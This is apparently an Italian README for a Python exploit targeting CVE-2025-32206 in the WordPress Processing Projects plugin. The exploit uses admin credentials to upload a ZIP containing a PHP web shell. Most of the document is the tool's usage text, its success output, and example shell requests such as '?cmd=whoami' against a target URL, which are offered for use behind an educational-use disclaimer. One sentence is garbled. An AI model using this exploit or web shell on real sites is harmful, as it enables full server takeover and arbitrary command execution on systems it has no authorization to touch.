
WordPress Processing Projects Plugin <= 1.0.2 è vulnerabile al caricamento arbitrario di file.
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"Vulnerabilità di Upload senza Restrizioni di File con Tipo Pericoloso in LABCAT Processing Projects permette agli attaccanti di caricare una web shell su un server web. Ciò può portare al compromesso completo."
Questo script exploit in Python prende di mira siti WordPress che utilizzano il plugin vulnerabile Processing Projects (versione <= 1.0.2). Il plugin gestisce in modo improprio i caricamenti di file da parte di utenti autenticati, consentendo loro di caricare file ZIP arbitrari che includono codice PHP eseguibile (web shell).
Lo script exploit:
Nxploited.zip) contenente una shell PHP dannosa (Nxploit.php).http://target.com/wp-content/uploads/processing-projects/Nxploit.phpUna volta che la shell è stata caricata con successo, può essere utilizzata per eseguire comandi di sistema tramite il parametro cmd. Esempi:
http://target.com/wp-content/uploads/processing-projects/Nxploit.php?cmd=whoami
http://target.com/wp-content/uploads/processing-projects/Nxploit.php?cmd=ls
Questa shell esegue comandi OS arbitrari e restituisce il loro output direttamente nella risposta.
usage: CVE-2025-32206.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit per CVE-2025-32206 | Di Nxploited (Khaled Alenazi)
options:
-h, --help mostra questo messaggio di aiuto ed esci
-u, --url URL URL del sito WordPress target (es. http://target.com/wordpress)
-un, --username USERNAME Nome utente amministratore WordPress
-p, --password PASSWORD Password amministratore WordPress
[+] CVE-2025-32206 | WordPress Processing Projects <= 1.0.2 - Upload Arbitrario di File
[+] Di Nxploited | Khaled Alenazi
[+] Zip creato con shell: Nxploited.zip -> Nxploit.php
[+] Accesso effettuato con successo.
[+] Campi del modulo estratti con successo.
[+] Richiesta di upload inviata con successo.
[+] Shell eseguita su: http://target.com/wp-content/uploads/processing-projects/Nxploit.php
Questo script è fornito esclusivamente a scopo educativo. L'uso non autorizzato di questo exploit su sistemi di cui non si possiede o non si ha esplicita autorizzazione a testare è illegale e non etico.
Segui sempre le pratiche di divulgazione responsabile e utilizza questo strumento solo in ambienti controllati o con autorizzazione esplicita.
Di : Nxploited | Khaled Alenazi